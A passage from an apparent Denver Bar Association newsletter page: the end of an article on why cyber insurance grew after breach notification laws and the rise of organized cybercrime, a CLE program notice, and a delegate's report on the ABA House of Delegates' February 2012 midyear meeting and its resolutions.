First, in 2003, California passed SB1386, the world’s first breach notification law. The reality then (as now) is that companies suffer security breaches each and every day. Prior to SB1386, however, breaches of personal information simply went unreported. With SB1386 and the subsequent passage of breach notice laws in 45 other states (and now coming internationally), the risk profile changed for data breaches. Instead of burying the breaches, companies were required to incur significant direct expenses to investigate security breaches and comply with applicable breach notice laws, including the offering of credit monitoring to affected individuals (which is not legally required by existing breach notice laws, but is optionally provided by many companies or “suggested” by state regulators). As a result, the plaintiffs’ bar now had notice of security breaches and began filing class action lawsuits after big breaches (usually involving high-profile brand name organizations). As such, cyber insurance coverage went from coverage addressing a hypothetical risk of future lawsuits, to a coverage addressing real-life risk (and now we have lawsuits getting deeper into litigation and public settlements of these types of cases). Moreover, shortly after the passage of SB 1386 many cyber insurance policies began covering the direct costs associated with complying with breach notification laws, including attorney fees, forensic investigation expenses, printing and mailing costs, credit monitoring expenses and call center expenses.  Breach notification costs are direct and almost unavoidable after a personal information breach.  Regardless of lawsuit activity, a direct financial rationale for cyber insurance coverage now existed.

The other change that occurred more gradually over time, but which has had a significant impact concerning the frequency and magnitude of data breaches, was organized crime. In the early 2000s, hacking was more of an exercise in annoyance or was done for bragging purposes. Hackers at that time wanted their exploits talked about and known. They wanted credit for hacking into or bringing down a sophisticated company (or better yet a division of the Federal Government or military). As such, when an attack happened it was discovered and remediated, and that would be the end of it.

True criminals, of course, are less interested in such notoriety. In fact, when trying to steal thousands/millions of records to commit identity theft or credit card fraud it is much better to NOT be detected. Lingering on a company’s network taking information for months or years is a much more profitable endeavor. Recognizing that this type of crime is low risk (it can be performed from thousands of miles away in Eastern Europe with almost no chance of getting caught) and high reward, organized crime flooded into the space. And in this context the word “organized” is truly appropriate – these enterprises retain very smart IT-oriented people that use every tool possible to scale and automate their crimes. They leverage the communication tools on the Internet to fence their “goods” creating, for example, wholesale and retail markets for credit cards, or “eBay”-like auction sites to hawk their illicit wares (e.g. valuable information). The change in orientation described above has essentially resulted in a 24/7/365 relentless crime machine constantly attacking and looking for new ways to attack, and always seeming to be one step ahead of those seeking to stop them. That is why we read about security and privacy breaches practically every day in the newspaper.

Fast-forward to present time. Cyber insurance is a much more established market with more carriers entering on a regular basis. There are primary and excess markets available for big risks, and companies of all sizes are looking at cyber more as a mandatory purchase rather than discretionary. As the world continues to change at seemingly light-speed and cyber risks increase (with the advent of hacktivism, social media and the consumerization of IT/BYOD), the need for cyber is also growing. With competition pushing cyber insurance prices down, and significant security and privacy risk being retained by organizations, risk transfer is becoming very attractive (and from an overall big picture systemic point of view, spreading risk is also attractive). The price may be right, and the peace of mind priceless.

Click here to read the full article. Program registration information below.

CLE Program: Is Your Sensitive Data Secure? Cyber Insurance for Your Firm and Your Clients

This CLE presentation will take place on Thursday, March 29. Participants may attend live in our classroom or watch the live webcast.

If you can’t make the live program or webcast, the program will also be available as a homestudy in two formats: video on-demand and mp3 download.

Report from the ABA House of Delegates Meetings at the 2012 Midyear Meeting in New Orleans

I have the privilege of serving the Denver Bar Association as a delegate to the American Bar Association (“ABA”) House of Delegates.  The ABA House of Delegates met at the ABA’s midyear meeting held in New Orleans, Louisiana, on February 6, 2012.  This Article summarizes the House of Delegates events at the midyear meeting and the action taken by the House.

The Midyear Meeting was very well-attended.  It had the best reported attendance on record.  The ABA sponsored numerous programs on issues such as the Ethics 20/20 commission, the state court funding crisis, and efforts to improve access to justice.  There were many important issues addressed by the House of Delegates at the midyear meeting.  This Article summarizes a few of them.

Ethics 20/20 Commission’s White Papers and Proposals Relating to the Ethics of Litigation Financing, Non-Lawyer Ownership of Law Firms, Outsourcing, and the Use of Technology and Mobile Devices

Before the House of Delegates convened, the Ethics 20/20 Commission sent information around to the delegates regarding the work of the Commission and its proposals.  Specifically, the Commission informed the delegates of its plan to bifurcate its presentation of proposals to help facilitate the House of Delegates’ consideration of the Commission’s recommendations.  The decision to bifurcate the presentation of proposals foretells a concern that some of the Commission’s proposals will be controversial and will generate much discussion and debate.

Indeed, from the preview that the Commission has provided, some of the issues that the Commission will put before the House will generate much discussion.  The Commission has produced white papers that discuss many of the complex ethical issues that cannot effectively be addressed through changes to Model Rules.  Specifically, one of the Commission’s white papers discusses ethical issues involved with litigation financing, including issues regarding conflicts of interest, a lawyer’s duty of confidentiality, the attorney-client privilege, and rules regulating the exercise of the lawyer’s independent judgment.  The Commission’s white paper can be found by clicking here.

The Commission also is working on proposals relating to alternative business structures for law firms, outsourcing of legal services and confidentiality-related ethics issues arising from lawyers’ use of technology. Additionally, the Commission also is working on a model rule relating to lawyers’ obligations to retain client files.  An issues paper regarding alternative business structures for law firms – including non-lawyer ownership of law firms – has been distributed by the Commission.  It can be found by clicking here.

During the House of Delegates meeting, Former ABA President Carolyn B. Lamm addressed the House about the Commission’s progress.  President Lamm explained that numerous roundtable sessions and meetings have been held around the country.  She explained that formal recommendations will be presented at the annual meeting in 2012 and at the midyear meeting in 2013.  President Lamm explained that one of the Commission’s more controversial issues is whether non-lawyers should be allowed under legal ethics rules to have a limited ownership interest in law firms in the United States.  This issue has been discussed extensively in Colorado previously.

President Lamm explained that the Commission is considering other issues relating to the need to balance the convenience and efficiencies inherent in a lawyer’s use of new technologies, while also preserving the lawyer-client relationship, confidentiality, competence and the values of the profession.  President Lamm explained that the Commission plans to present proposals on each of these issues for consideration by the House of Delegates.  All interested members of the Bar should get in touch with me or other Colorado delegates to discuss any concerns about any of the issues that are being considered by the Ethics 20/20 Commission, or the proposals that are likely coming from the Commission.

Summary of the House of Delegates

After the House of Delegates convened on February 6, 2012, the Delegates were greeted by Mitchell Landrieu, the Mayor of New Orleans, who also is a lawyer.  Mayor Landrieu talked about the challenges that the city has been through in recent years, with Hurricanes Katrina and Rita, and the BP oil spill.  Mayor Landrieu quipped that the city is “waiting for locusts now.”  Mayor Landrieu’s speech was interesting and insightful, explaining that New Orleans is truly resilient and has become “a laboratory for innovation and change,” because of the disasters it has suffered.  Mayor Landrieu’s speech was an excellent way to kick off the work of the House.

After the Mayor’s speech and some other introductory actions, the House got to work debating and voting on resolutions before the House.  The House adopted a number of important resolutions, including:

  • Resolution 101A, which adopted the black letter ABA Criminal Justice Standards on Law Enforcement Access to Third Party Records, which provide a framework through which legislatures, courts acting in their supervisory capacity and administrative agencies can balance the needs of law enforcement and the interests of privacy, freedom of expression and social participation.
  • Resolution 101B, which urged governments at various levels to require laboratories producing reports for use in criminal trials to adopt pretrial discovery procedures requiring comprehensive and comprehensible laboratory and forensic science reports, and listed relevant factors to be included in such reports.
  • Resolution 101C, which urged trial judges who have decided to admit expert testimony to consider a number of factors in determining the manner in which that evidence should be presented to the jury, and also provided guidance about how to instruct the jury in its evaluation of expert scientific testimony in criminal and delinquency proceedings.
  • Resolution 101F, which supported legislation, policies and practices that allow equal and uniform access to therapeutic courts and problem-solving sentencing alternatives, such as drug treatment and anger management counseling, regardless of the custody or detention status of the individual.
  • Resolution 113, which called for adoption as ABA policy uniform standards for language access in courts.  The policy provides clear guidance to courts in designing, implementing, and enforcing a comprehensive system of language access services that is suited to the need in the communities they serve.
  • Resolution 102B, which approved the Uniform Electronic Legal Material Act promulgated by the National Conference of Commissioners on Uniform State Laws in 2011, as an appropriate Act for those states desiring to adopt the specific substantive law suggested therein.  The Uniform Act provides rules for the authentication and preservation of electronic legal material.
  • Resolution 108, which urged state and territorial bar admission authorities to adopt rules and procedures to accommodate the unique needs of military spouse attorneys who move frequently in support of the nation’s defenses.
  • Resolution 111, which urged entities that administer a law school admission test to provide appropriate accommodations for a test taker with a disability to best ensure the exam reflects what the test is designed to measure and not the test taker’s disability.
  • Resolution 302, which supported the principle that “private” lawyers representing governmental entities are entitled to claim the same qualified immunity provided “government” lawyers when they are acting “under color of state law.”  This issue is particularly important given that there is a pending case before the United States Supreme Court considering this question.  See Filarsky v. Delia, U.S. No. 10-1018, argued 1/17/2012.

A summary of the resolutions adopted by the House can be found by clicking here.  Additionally, I can provide a copy of the resolutions to any interested reader. Contact me if interested.

Statement from President Robinson

In addition to this important work, the House of Delegates heard from Bill Robinson, President of the ABA.  President Robinson explained that the most pressing issue facing the legal system today is under-funding of the courts, which is at a crisis level.  President Robinson urged all ABA members to consider the under-funding crisis to be a threat to our liberty and rule of law.  President Robinson explained the ABA’s efforts to combat this crisis, including its extensive education efforts and its efforts to increase public awareness about the crisis.  Additionally, the ABA has made the crisis the core of its Law Day events, which will focus on the theme: “No Courts, No Justice, No Freedom.”

Nomination of James Silkenat as President-Elect

Additionally, the nominating committee announced that James Silkenat of New York was nominated to be President-Elect Designee of the ABA.  The House of Delegates will vote on his nomination at the Annual Meeting in Chicago this August.  If elected, Mr. Silkenat will serve a one-year term as President beginning in August, 2013.  All members of the Bar are urged to give any input on Mr. Silkenat to me or any of the other Colorado delegates.

Other Matters

Finally, the House of Delegates also considered other matters.  Those other matters included a report from the ABA’s Executive Director, Jack Rives, and a report from the ABA’s treasurer.  The House also heard from Chief Judge Washington, who is the President of the Conference of Chief Justices.  Chief Judge Washington spoke about language access to the courts.  He also discussed the core focuses of the Conference, which are judicial independence and civics education.

Conclusion

I hope this Article sufficiently highlighted many of the more interesting or important agenda items considered by the House of Delegates at the midyear meeting in New Orleans.  I appreciate all input that any members of the Denver Bar Association have regarding any of the issues that have been considered, or will be considered, by the ABA House of Delegates.


The Docket eFile brings features from your favorite Denver Bar Association publication to you digitally. When you see the logo, you’re reading an article from The Docket. You’ll also still be able to read the full issue online at denbar.org/docket.